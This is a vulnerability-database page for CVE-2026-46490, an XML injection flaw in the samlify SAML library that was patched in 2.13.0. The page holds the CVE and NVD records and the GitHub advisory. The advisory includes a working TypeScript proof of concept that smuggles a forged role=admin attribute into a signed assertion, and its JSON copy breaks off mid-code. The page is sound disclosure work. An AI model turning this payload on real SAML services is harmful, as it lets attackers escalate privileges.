Vulnerability-Lookup

CVE-2026-46490 (GCVE-0-2026-46490)

Vulnerability from cvelistv5 – Published: 2026-06-08 18:41 – Updated: 2026-06-09 15:13

Title

samlify: XML Injection in AttributeValue Allows Privilege Escalation in Signed SAML Assertions

Summary

samlify is a Node.js library for SAML single sign-on. Prior to version 2.13.0, samlify’s template substitution only escapes attribute contexts. Values inserted into element text (e.g., <saml:AttributeValue>) are not escaped. A normal user can inject XML markup into an attribute value (e.g., email, name) and add new <saml:Attribute> elements inside the signed assertion. The IdP then signs the tampered assertion and the SP accepts the injected attributes as trusted. This allows privilege escalation when attributes are used for authorization (roles/groups). This issue has been patched in version 2.13.0.

Severity

8.7 (High)


                        
                          CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N

SSVC

Exploitation: poc Automatable: yes Technical Impact: partial

CISA Coordinator (v2.0.3)

CWE

CWE-91 - XML Injection (aka Blind XPath Injection)

Assigner

GitHub_M

References

1 reference

URL	Tags
https://github.com/tngan/samlify/security/advisor…	x_refsource_CONFIRM

Impacted products

1 product

Vendor	Product	Version
tngan	samlify	Affected: < 2.13.0

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2026-46490",
                "options": [
                  {
                    "Exploitation": "poc"
                  },
                  {
                    "Automatable": "yes"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2026-06-09T14:51:00.913741Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2026-06-09T15:13:53.540Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "references": [
          {
            "tags": [
              "exploit"
            ],
            "url": "https://github.com/tngan/samlify/security/advisories/GHSA-34r5-q4jw-r36m"
          }
        ],
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "samlify",
          "vendor": "tngan",
          "versions": [
            {
              "status": "affected",
              "version": "\u003c 2.13.0"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "samlify is a Node.js library for SAML single sign-on. Prior to version 2.13.0, samlify\u2019s template substitution only escapes attribute contexts. Values inserted into element text (e.g., \u003csaml:AttributeValue\u003e) are not escaped. A normal user can inject XML markup into an attribute value (e.g., email, name) and add new \u003csaml:Attribute\u003e elements inside the signed assertion. The IdP then signs the tampered assertion and the SP accepts the injected attributes as trusted. This allows privilege escalation when attributes are used for authorization (roles/groups). This issue has been patched in version 2.13.0."
        }
      ],
      "metrics": [
        {
          "cvssV4_0": {
            "attackComplexity": "LOW",
            "attackRequirements": "NONE",
            "attackVector": "NETWORK",
            "baseScore": 8.7,
            "baseSeverity": "HIGH",
            "privilegesRequired": "NONE",
            "subAvailabilityImpact": "NONE",
            "subConfidentialityImpact": "NONE",
            "subIntegrityImpact": "NONE",
            "userInteraction": "NONE",
            "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N",
            "version": "4.0",
            "vulnAvailabilityImpact": "NONE",
            "vulnConfidentialityImpact": "NONE",
            "vulnIntegrityImpact": "HIGH"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-91",
              "description": "CWE-91: XML Injection (aka Blind XPath Injection)",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-06-08T18:41:40.145Z",
        "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
        "shortName": "GitHub_M"
      },
      "references": [
        {
          "name": "https://github.com/tngan/samlify/security/advisories/GHSA-34r5-q4jw-r36m",
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://github.com/tngan/samlify/security/advisories/GHSA-34r5-q4jw-r36m"
        }
      ],
      "source": {
        "advisory": "GHSA-34r5-q4jw-r36m",
        "discovery": "UNKNOWN"
      },
      "title": "samlify: XML Injection in AttributeValue Allows Privilege Escalation in Signed SAML Assertions"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
    "assignerShortName": "GitHub_M",
    "cveId": "CVE-2026-46490",
    "datePublished": "2026-06-08T18:41:40.145Z",
    "dateReserved": "2026-05-14T18:06:06.811Z",
    "dateUpdated": "2026-06-09T15:13:53.540Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2",
  "vulnerability-lookup:meta": {
    "epss": {
      "cve": "CVE-2026-46490",
      "date": "2026-06-10",
      "epss": "0.00049",
      "percentile": "0.15598"
    },
    "nvd": "{\"cve\":{\"id\":\"CVE-2026-46490\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2026-06-08T19:16:45.950\",\"lastModified\":\"2026-06-09T16:48:56.767\",\"vulnStatus\":\"Analyzed\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"samlify is a Node.js library for SAML single sign-on. Prior to version 2.13.0, samlify\u2019s template substitution only escapes attribute contexts. Values inserted into element text (e.g., \u003csaml:AttributeValue\u003e) are not escaped. A normal user can inject XML markup into an attribute value (e.g., email, name) and add new \u003csaml:Attribute\u003e elements inside the signed assertion. The IdP then signs the tampered assertion and the SP accepts the injected attributes as trusted. This allows privilege escalation when attributes are used for authorization (roles/groups). This issue has been patched in version 2.13.0.\"}],\"metrics\":{\"cvssMetricV40\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"4.0\",\"vectorString\":\"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X\",\"baseScore\":8.7,\"baseSeverity\":\"HIGH\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"attackRequirements\":\"NONE\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"NONE\",\"vulnConfidentialityImpact\":\"NONE\",\"vulnIntegrityImpact\":\"HIGH\",\"vulnAvailabilityImpact\":\"NONE\",\"subConfidentialityImpact\":\"NONE\",\"subIntegrityImpact\":\"NONE\",\"subAvailabilityImpact\":\"NONE\",\"exploitMaturity\":\"NOT_DEFINED\",\"confidentialityRequirement\":\"NOT_DEFINED\",\"integrityRequirement\":\"NOT_DEFINED\",\"availabilityRequirement\":\"NOT_DEFINED\",\"modifiedAttackVector\":\"NOT_DEFINED\",\"modifiedAttackComplexity\":\"NOT_DEFINED\",\"modifiedAttackRequirements\":\"NOT_DEFINED\",\"modifiedPrivilegesRequired\":\"NOT_DEFINED\",\"modifiedUserInteraction\":\"NOT_DEFINED\",\"modifiedVulnConfidentialityImpact\":\"NOT_DEFINED\",\"modifiedVulnIntegrityImpact\":\"NOT_DEFINED\",\"modifiedVulnAvailabilityImpact\":\"NOT_DEFINED\",\"modifiedSubConfidentialityImpact\":\"NOT_DEFINED\",\"modifiedSubIntegrityImpact\":\"NOT_DEFINED\",\"modifiedSubAvailabilityImpact\":\"NOT_DEFINED\",\"Safety\":\"NOT_DEFINED\",\"Automatable\":\"NOT_DEFINED\",\"Recovery\":\"NOT_DEFINED\",\"valueDensity\":\"NOT_DEFINED\",\"vulnerabilityResponseEffort\":\"NOT_DEFINED\",\"providerUrgency\":\"NOT_DEFINED\"}}],\"cvssMetricV31\":[{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\",\"baseScore\":8.8,\"baseSeverity\":\"HIGH\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"LOW\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"HIGH\",\"integrityImpact\":\"HIGH\",\"availabilityImpact\":\"HIGH\"},\"exploitabilityScore\":2.8,\"impactScore\":5.9}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-91\"}]}],\"configurations\":[{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:samlify_project:samlify:*:*:*:*:*:*:*:*\",\"versionEndExcluding\":\"2.13.0\",\"matchCriteriaId\":\"388249D4-2C25-4190-AE01-8F3CAD3E2C07\"}]}]}],\"references\":[{\"url\":\"https://github.com/tngan/samlify/security/advisories/GHSA-34r5-q4jw-r36m\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Exploit\",\"Vendor Advisory\"]},{\"url\":\"https://github.com/tngan/samlify/security/advisories/GHSA-34r5-q4jw-r36m\",\"source\":\"134c704f-9b21-4f2e-91b3-4a467353bcc0\",\"tags\":[\"Exploit\",\"Vendor Advisory\"]}]}}",
    "vulnrichment": {
      "containers": "{\"cna\": {\"title\": \"samlify: XML Injection in AttributeValue Allows Privilege Escalation in Signed SAML Assertions\", \"source\": {\"advisory\": \"GHSA-34r5-q4jw-r36m\", \"discovery\": \"UNKNOWN\"}, \"metrics\": [{\"cvssV4_0\": {\"version\": \"4.0\", \"baseScore\": 8.7, \"attackVector\": \"NETWORK\", \"baseSeverity\": \"HIGH\", \"vectorString\": \"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N\", \"userInteraction\": \"NONE\", \"attackComplexity\": \"LOW\", \"attackRequirements\": \"NONE\", \"privilegesRequired\": \"NONE\", \"subIntegrityImpact\": \"NONE\", \"vulnIntegrityImpact\": \"HIGH\", \"subAvailabilityImpact\": \"NONE\", \"vulnAvailabilityImpact\": \"NONE\", \"subConfidentialityImpact\": \"NONE\", \"vulnConfidentialityImpact\": \"NONE\"}}], \"affected\": [{\"vendor\": \"tngan\", \"product\": \"samlify\", \"versions\": [{\"status\": \"affected\", \"version\": \"\u003c 2.13.0\"}]}], \"references\": [{\"url\": \"https://github.com/tngan/samlify/security/advisories/GHSA-34r5-q4jw-r36m\", \"name\": \"https://github.com/tngan/samlify/security/advisories/GHSA-34r5-q4jw-r36m\", \"tags\": [\"x_refsource_CONFIRM\"]}], \"descriptions\": [{\"lang\": \"en\", \"value\": \"samlify is a Node.js library for SAML single sign-on. Prior to version 2.13.0, samlify\\u2019s template substitution only escapes attribute contexts. Values inserted into element text (e.g., \u003csaml:AttributeValue\u003e) are not escaped. A normal user can inject XML markup into an attribute value (e.g., email, name) and add new \u003csaml:Attribute\u003e elements inside the signed assertion. The IdP then signs the tampered assertion and the SP accepts the injected attributes as trusted. This allows privilege escalation when attributes are used for authorization (roles/groups). This issue has been patched in version 2.13.0.\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-91\", \"description\": \"CWE-91: XML Injection (aka Blind XPath Injection)\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2026-06-08T18:41:40.145Z\"}}, \"adp\": [{\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2026-46490\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"poc\"}, {\"Automatable\": \"yes\"}, {\"Technical Impact\": \"partial\"}], \"version\": \"2.0.3\", \"timestamp\": \"2026-06-09T14:51:00.913741Z\"}}}], \"references\": [{\"url\": \"https://github.com/tngan/samlify/security/advisories/GHSA-34r5-q4jw-r36m\", \"tags\": [\"exploit\"]}], \"providerMetadata\": {\"shortName\": \"CISA-ADP\", \"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"dateUpdated\": \"2026-06-09T14:51:10.801Z\"}}]}",
      "cveMetadata": "{\"cveId\": \"CVE-2026-46490\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2026-06-08T18:41:40.145Z\", \"dateReserved\": \"2026-05-14T18:06:06.811Z\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"datePublished\": \"2026-06-08T18:41:40.145Z\", \"assignerShortName\": \"GitHub_M\"}",
      "dataType": "CVE_RECORD",
      "dataVersion": "5.2"
    }
  }
}

FKIE_CVE-2026-46490

Vulnerability from fkie_nvd - Published: 2026-06-08 19:16 - Updated: 2026-06-09 16:48

Severity

8.8 (High) - CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Summary

References

	URL	Tags
	security-advisories@github.com	https://github.com/tngan/samlify/security/advisories/GHSA-34r5-q4jw-r36m	Exploit, Vendor Advisory
	134c704f-9b21-4f2e-91b3-4a467353bcc0	https://github.com/tngan/samlify/security/advisories/GHSA-34r5-q4jw-r36m	Exploit, Vendor Advisory

Impacted products

	Vendor	Product	Version
	samlify_project	samlify	*

JSON

To clipboard

{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:samlify_project:samlify:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "388249D4-2C25-4190-AE01-8F3CAD3E2C07",
              "versionEndExcluding": "2.13.0",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "samlify is a Node.js library for SAML single sign-on. Prior to version 2.13.0, samlify\u2019s template substitution only escapes attribute contexts. Values inserted into element text (e.g., \u003csaml:AttributeValue\u003e) are not escaped. A normal user can inject XML markup into an attribute value (e.g., email, name) and add new \u003csaml:Attribute\u003e elements inside the signed assertion. The IdP then signs the tampered assertion and the SP accepts the injected attributes as trusted. This allows privilege escalation when attributes are used for authorization (roles/groups). This issue has been patched in version 2.13.0."
    }
  ],
  "id": "CVE-2026-46490",
  "lastModified": "2026-06-09T16:48:56.767",
  "metrics": {
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "HIGH",
          "baseScore": 8.8,
          "baseSeverity": "HIGH",
          "confidentialityImpact": "HIGH",
          "integrityImpact": "HIGH",
          "privilegesRequired": "LOW",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
          "version": "3.1"
        },
        "exploitabilityScore": 2.8,
        "impactScore": 5.9,
        "source": "nvd@nist.gov",
        "type": "Primary"
      }
    ],
    "cvssMetricV40": [
      {
        "cvssData": {
          "Automatable": "NOT_DEFINED",
          "Recovery": "NOT_DEFINED",
          "Safety": "NOT_DEFINED",
          "attackComplexity": "LOW",
          "attackRequirements": "NONE",
          "attackVector": "NETWORK",
          "availabilityRequirement": "NOT_DEFINED",
          "baseScore": 8.7,
          "baseSeverity": "HIGH",
          "confidentialityRequirement": "NOT_DEFINED",
          "exploitMaturity": "NOT_DEFINED",
          "integrityRequirement": "NOT_DEFINED",
          "modifiedAttackComplexity": "NOT_DEFINED",
          "modifiedAttackRequirements": "NOT_DEFINED",
          "modifiedAttackVector": "NOT_DEFINED",
          "modifiedPrivilegesRequired": "NOT_DEFINED",
          "modifiedSubAvailabilityImpact": "NOT_DEFINED",
          "modifiedSubConfidentialityImpact": "NOT_DEFINED",
          "modifiedSubIntegrityImpact": "NOT_DEFINED",
          "modifiedUserInteraction": "NOT_DEFINED",
          "modifiedVulnAvailabilityImpact": "NOT_DEFINED",
          "modifiedVulnConfidentialityImpact": "NOT_DEFINED",
          "modifiedVulnIntegrityImpact": "NOT_DEFINED",
          "privilegesRequired": "NONE",
          "providerUrgency": "NOT_DEFINED",
          "subAvailabilityImpact": "NONE",
          "subConfidentialityImpact": "NONE",
          "subIntegrityImpact": "NONE",
          "userInteraction": "NONE",
          "valueDensity": "NOT_DEFINED",
          "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
          "version": "4.0",
          "vulnAvailabilityImpact": "NONE",
          "vulnConfidentialityImpact": "NONE",
          "vulnIntegrityImpact": "HIGH",
          "vulnerabilityResponseEffort": "NOT_DEFINED"
        },
        "source": "security-advisories@github.com",
        "type": "Secondary"
      }
    ]
  },
  "published": "2026-06-08T19:16:45.950",
  "references": [
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Exploit",
        "Vendor Advisory"
      ],
      "url": "https://github.com/tngan/samlify/security/advisories/GHSA-34r5-q4jw-r36m"
    },
    {
      "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
      "tags": [
        "Exploit",
        "Vendor Advisory"
      ],
      "url": "https://github.com/tngan/samlify/security/advisories/GHSA-34r5-q4jw-r36m"
    }
  ],
  "sourceIdentifier": "security-advisories@github.com",
  "vulnStatus": "Analyzed",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-91"
        }
      ],
      "source": "security-advisories@github.com",
      "type": "Secondary"
    }
  ]
}

GHSA-34R5-Q4JW-R36M

Vulnerability from github – Published: 2026-05-21 17:14 – Updated: 2026-06-09 13:12

Summary

samlify: XML Injection in AttributeValue Allows Privilege Escalation in Signed SAML Assertions

Details

Summary

samlify’s template substitution only escapes attribute contexts. Values inserted into element text (e.g., <saml:AttributeValue>) are not escaped. A normal user can inject XML markup into an attribute value (e.g., email, name) and add new <saml:Attribute> elements inside the signed assertion. The IdP then signs the tampered assertion and the SP accepts the injected attributes as trusted. This allows privilege escalation when attributes are used for authorization (roles/groups).

Root Cause

src/libsaml.ts → replaceTagsByValue() only escapes placeholders when preceded by a quote (attribute context). Element text is inserted raw. The attribute builder inserts placeholders into element text:

<saml:AttributeValue ...>{attrUserX}</saml:AttributeValue>

Therefore, </saml:AttributeValue>…<saml:Attribute …> is accepted and signed.

Proof-of-concept

poc/attribute_injection.ts

import { readFileSync } from 'fs';
import * as samlify from '../index';
import * as validator from '@authenio/samlify-xsd-schema-validator';

samlify.setSchemaValidator(validator);

const { IdentityProvider, ServiceProvider, SamlLib: libsaml, Utility: util } = samlify as any;

const loginResponseTemplate = {
  context: '<samlp:Response xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol" xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion" ID="{ID}" Version="2.0" IssueInstant="{IssueInstant}" Destination="{Destination}" InResponseTo="{InResponseTo}"><saml:Issuer>{Issuer}</saml:Issuer><samlp:Status><samlp:StatusCode Value="{StatusCode}"/></samlp:Status><saml:Assertion ID="{AssertionID}" Version="2.0" IssueInstant="{IssueInstant}" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion"><saml:Issuer>{Issuer}</saml:Issuer><saml:Subject><saml:NameID Format="{NameIDFormat}">{NameID}</saml:NameID><saml:SubjectConfirmation Method="urn:oasis:names:tc:SAML:2.0:cm:bearer"><saml:SubjectConfirmationData NotOnOrAfter="{SubjectConfirmationDataNotOnOrAfter}" Recipient="{SubjectRecipient}" InResponseTo="{InResponseTo}"/></saml:SubjectConfirmation></saml:Subject><saml:Conditions NotBefore="{ConditionsNotBefore}" NotOnOrAfter="{ConditionsNotOnOrAfter}"><saml:AudienceRestriction><saml:Audience>{Audience}</saml:Audience></saml:AudienceRestriction></saml:Conditions>{AttributeStatement}</saml:Assertion></samlp:Response>',
  attributes: [
    { name: 'mail', valueTag: 'user.email', nameFormat: 'urn:oasis:names:tc:SAML:2.0:attrname-format:basic', valueXsiType: 'xs:string' },
    { name: 'injection', valueTag: 'user.injection', nameFormat: 'urn:oasis:names:tc:SAML:2.0:attrname-format:basic', valueXsiType: 'xs:string' },
  ],
};

const idp = IdentityProvider({
  privateKey: readFileSync('./test/key/idp/privkey.pem'),
  privateKeyPass: 'q9ALNhGT5EhfcRmp8Pg7e9zTQeP2x1bW',
  isAssertionEncrypted: false,
  metadata: readFileSync('./test/misc/idpmeta.xml'),
  loginResponseTemplate,
});

const sp = ServiceProvider({
  privateKey: readFileSync('./test/key/sp/privkey.pem'),
  privateKeyPass: 'VHOSp5RUiBcrsjrcAuXFwU1NKCkGA8px',
  isAssertionEncrypted: false,
  metadata: readFileSync('./test/misc/spmeta.xml'),
});

const buildTemplate = (_idp: any, _sp: any, _binding: any, user: any) => (template: string) => {
  const now = new Date();
  const fiveMinutesLater = new Date(now.getTime() + 300_000);
  const tvalue = {
    ID: _idp.entitySetting.generateID(),
    AssertionID: _idp.entitySetting.generateID(),
    Destination: _sp.entityMeta.getAssertionConsumerService('post'),
    Audience: _sp.entityMeta.getEntityID(),
    SubjectRecipient: _sp.entityMeta.getAssertionConsumerService('post'),
    NameIDFormat: 'urn:oasis:names:tc:SAML:1.1:nameid-format:emailAddress',
    NameID: user.email,
    Issuer: _idp.entityMeta.getEntityID(),
    IssueInstant: now.toISOString(),
    ConditionsNotBefore: now.toISOString(),
    ConditionsNotOnOrAfter: fiveMinutesLater.toISOString(),
    SubjectConfirmationDataNotOnOrAfter: fiveMinutesLater.toISOString(),
    InResponseTo: 'request-id',
    StatusCode: 'urn:oasis:names:tc:SAML:2.0:status:Success',
    attrUserEmail: user.email,
    attrUserInjection: user.injection,
  };

  return { id: tvalue.ID, context: libsaml.replaceTagsByValue(template, tvalue) };
};

async function main() {
  const injection = [
    'safe',
    '</saml:AttributeValue></saml:Attribute>',
    '<saml:Attribute Name="role" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:basic">',
    '<saml:AttributeValue xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:type="xs:string">admin</saml:AttributeValue>',
    '</saml:Attribute>',
    '<saml:Attribute Name="injection" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:basic">',
    '<saml:AttributeValue xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:type="xs:string">safe'
  ].join('');

  const user = { email: 'user@esaml2.com', injection };
  const { context: SAMLResponse } = await idp.createLoginResponse(
    sp,
    { extract: { request: { id: 'request-id' } } },
    'post',
    user,
    buildTemplate(idp, sp, 'post', user)
  );

  const xml = util.base64Decode(SAMLResponse, true).toString();
  console.log('--- Generated XML snippet ---');
  console.log(xml.slice(xml.indexOf('<saml:AttributeStatement'), xml.indexOf('</saml:AttributeStatement>') + 26));

  const { extract } = await sp.parseLoginResponse(idp, 'post', { body: { SAMLResponse } });

  console.log('Parsed attributes:', extract.attributes);
}

main().catch(err => {
  console.error('PoC failed:', err?.message || err);
  process.exitCode = 1;
});

Run:

  npm install --legacy-peer-deps
  npx ts-node poc/attribute_injection.ts

Impact

A normal user can inject arbitrary attributes (e.g., role=admin) into a signed assertion and have them parsed by sp.parseLoginResponse(). This can grant elevated privileges in SPs that trust SAML attributes.

Severity

8.7 (High)


                  
                    CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N

Show details on source website

JSON

To clipboard

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "samlify"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "2.13.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-46490"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-91"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-05-21T17:14:07Z",
    "nvd_published_at": "2026-06-08T19:16:45Z",
    "severity": "HIGH"
  },
  "details": "## Summary\n\nsamlify\u2019s template substitution only escapes attribute contexts. Values inserted into element text (e.g., `\u003csaml:AttributeValue\u003e`) are not escaped. A normal user can inject XML markup into an attribute value (e.g., email, name) and add new `\u003csaml:Attribute\u003e` elements inside the signed assertion. The IdP then signs the tampered assertion and the SP accepts the injected attributes as trusted. This allows privilege escalation when attributes are used for authorization (roles/groups).\n\n## Root Cause\n\n`src/libsaml.ts` \u2192 `replaceTagsByValue()` only escapes placeholders when preceded by a quote (attribute context). Element text is inserted raw. The attribute builder inserts placeholders into element text:\n\n```\n\u003csaml:AttributeValue ...\u003e{attrUserX}\u003c/saml:AttributeValue\u003e\n```\n\nTherefore, `\u003c/saml:AttributeValue\u003e\u2026\u003csaml:Attribute \u2026\u003e` is accepted and signed.\n\n## Proof-of-concept\n\n- poc/attribute_injection.ts\n\n```TS\nimport { readFileSync } from \u0027fs\u0027;\nimport * as samlify from \u0027../index\u0027;\nimport * as validator from \u0027@authenio/samlify-xsd-schema-validator\u0027;\n\nsamlify.setSchemaValidator(validator);\n\nconst { IdentityProvider, ServiceProvider, SamlLib: libsaml, Utility: util } = samlify as any;\n\nconst loginResponseTemplate = {\n  context: \u0027\u003csamlp:Response xmlns:samlp=\"urn:oasis:names:tc:SAML:2.0:protocol\" xmlns:saml=\"urn:oasis:names:tc:SAML:2.0:assertion\" ID=\"{ID}\" Version=\"2.0\" IssueInstant=\"{IssueInstant}\" Destination=\"{Destination}\" InResponseTo=\"{InResponseTo}\"\u003e\u003csaml:Issuer\u003e{Issuer}\u003c/saml:Issuer\u003e\u003csamlp:Status\u003e\u003csamlp:StatusCode Value=\"{StatusCode}\"/\u003e\u003c/samlp:Status\u003e\u003csaml:Assertion ID=\"{AssertionID}\" Version=\"2.0\" IssueInstant=\"{IssueInstant}\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xmlns:xs=\"http://www.w3.org/2001/XMLSchema\" xmlns:saml=\"urn:oasis:names:tc:SAML:2.0:assertion\"\u003e\u003csaml:Issuer\u003e{Issuer}\u003c/saml:Issuer\u003e\u003csaml:Subject\u003e\u003csaml:NameID Format=\"{NameIDFormat}\"\u003e{NameID}\u003c/saml:NameID\u003e\u003csaml:SubjectConfirmation Method=\"urn:oasis:names:tc:SAML:2.0:cm:bearer\"\u003e\u003csaml:SubjectConfirmationData NotOnOrAfter=\"{SubjectConfirmationDataNotOnOrAfter}\" Recipient=\"{SubjectRecipient}\" InResponseTo=\"{InResponseTo}\"/\u003e\u003c/saml:SubjectConfirmation\u003e\u003c/saml:Subject\u003e\u003csaml:Conditions NotBefore=\"{ConditionsNotBefore}\" NotOnOrAfter=\"{ConditionsNotOnOrAfter}\"\u003e\u003csaml:AudienceRestriction\u003e\u003csaml:Audience\u003e{Audience}\u003c/saml:Audience\u003e\u003c/saml:AudienceRestriction\u003e\u003c/saml:Conditions\u003e{AttributeStatement}\u003c/saml:Assertion\u003e\u003c/samlp:Response\u003e\u0027,\n  attributes: [\n    { name: \u0027mail\u0027, valueTag: \u0027user.email\u0027, nameFormat: \u0027urn:oasis:names:tc:SAML:2.0:attrname-format:basic\u0027, valueXsiType: \u0027xs:string\u0027 },\n    { name: \u0027injection\u0027, valueTag: \u0027user.injection\u0027, nameFormat: \u0027urn:oasis:names:tc:SAML:2.0:attrname-format:basic\u0027, valueXsiType: \u0027xs:string\u0027 },\n  ],\n};\n\nconst idp = IdentityProvider({\n  privateKey: readFileSync(\u0027./test/key/idp/privkey.pem\u0027),\n  privateKeyPass: \u0027q9ALNhGT5EhfcRmp8Pg7e9zTQeP2x1bW\u0027,\n  isAssertionEncrypted: false,\n  metadata: readFileSync(\u0027./test/misc/idpmeta.xml\u0027),\n  loginResponseTemplate,\n});\n\nconst sp = ServiceProvider({\n  privateKey: readFileSync(\u0027./test/key/sp/privkey.pem\u0027),\n  privateKeyPass: \u0027VHOSp5RUiBcrsjrcAuXFwU1NKCkGA8px\u0027,\n  isAssertionEncrypted: false,\n  metadata: readFileSync(\u0027./test/misc/spmeta.xml\u0027),\n});\n\nconst buildTemplate = (_idp: any, _sp: any, _binding: any, user: any) =\u003e (template: string) =\u003e {\n  const now = new Date();\n  const fiveMinutesLater = new Date(now.getTime() + 300_000);\n  const tvalue = {\n    ID: _idp.entitySetting.generateID(),\n    AssertionID: _idp.entitySetting.generateID(),\n    Destination: _sp.entityMeta.getAssertionConsumerService(\u0027post\u0027),\n    Audience: _sp.entityMeta.getEntityID(),\n    SubjectRecipient: _sp.entityMeta.getAssertionConsumerService(\u0027post\u0027),\n    NameIDFormat: \u0027urn:oasis:names:tc:SAML:1.1:nameid-format:emailAddress\u0027,\n    NameID: user.email,\n    Issuer: _idp.entityMeta.getEntityID(),\n    IssueInstant: now.toISOString(),\n    ConditionsNotBefore: now.toISOString(),\n    ConditionsNotOnOrAfter: fiveMinutesLater.toISOString(),\n    SubjectConfirmationDataNotOnOrAfter: fiveMinutesLater.toISOString(),\n    InResponseTo: \u0027request-id\u0027,\n    StatusCode: \u0027urn:oasis:names:tc:SAML:2.0:status:Success\u0027,\n    attrUserEmail: user.email,\n    attrUserInjection: user.injection,\n  };\n\n  return { id: tvalue.ID, context: libsaml.replaceTagsByValue(template, tvalue) };\n};\n\nasync function main() {\n  const injection = [\n    \u0027safe\u0027,\n    